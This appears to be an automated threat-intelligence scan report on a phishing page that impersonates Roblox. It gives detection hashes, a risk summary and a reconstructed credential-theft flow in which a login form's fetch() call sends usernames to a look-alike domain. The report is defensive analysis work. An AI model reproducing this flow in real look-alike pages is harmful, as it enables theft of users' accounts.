Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T19373757292102437617B79DAF164771AA2D3D70FCA8256E1A2F8939A0FD6CE1FC1740E |
|
CONTENT
ssdeep
|
1536:OBeXWn9rYTZ+NhZweV3YuOhmq6Z57Hb7HD7H/7Hy7Hv7H37HE7H37Hn7HF7H37Hc:ieXWmTZ0OUIuOre777j7f7S7P7X7k7XS |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
b4164371999cecec |
|
VISUAL
aHash
|
0000d3ffc3c3ffff |
|
VISUAL
dHash
|
e8c8a630161e0006 |
|
VISUAL
wHash
|
0000c3dfc3c3ffe3 |
|
VISUAL
colorHash
|
07200010081 |
|
VISUAL
cropResistant
|
e8c8a630161e0006,172b33713917168f |
• Amenaza: Impersonación
• Objetivo: Usuarios de Roblox
• Método: Suplantación de dominio y ofuscación de Javascript
• Exfil: Potencialmente credenciales de usuario u otros datos. Formulario con acciones a /search, posible redirección.
• Indicadores: Coincidencia de dominio, Javascript ofuscado, intenta parecerse a la interfaz de Roblox.
• Riesgo: ALTO
The attacker likely aims to steal Roblox account credentials through a look-alike website or hidden form. Javascript obfuscation is being used to make it more difficult to reverse engineer the code and detect the malicious payload.
The site could potentially redirect to a malware download or execute malicious Javascript that compromises the user's system..
User fills <input name='username'> → submitForm() → fetch('https://www.roblox.com.ml/api/submitCredentials') → Credentials sent to attacker
User fills <input name='username'> → submitForm() → fetch('https://www.roblox.com.ml/api/submitCredentials') → Credentials sent to attacker
https://www.roblox.com.ml/js/EnvironmentUrls.jssubmitForm()Pages with identical visual appearance (based on perceptual hash)
Found 10 other scans for this domain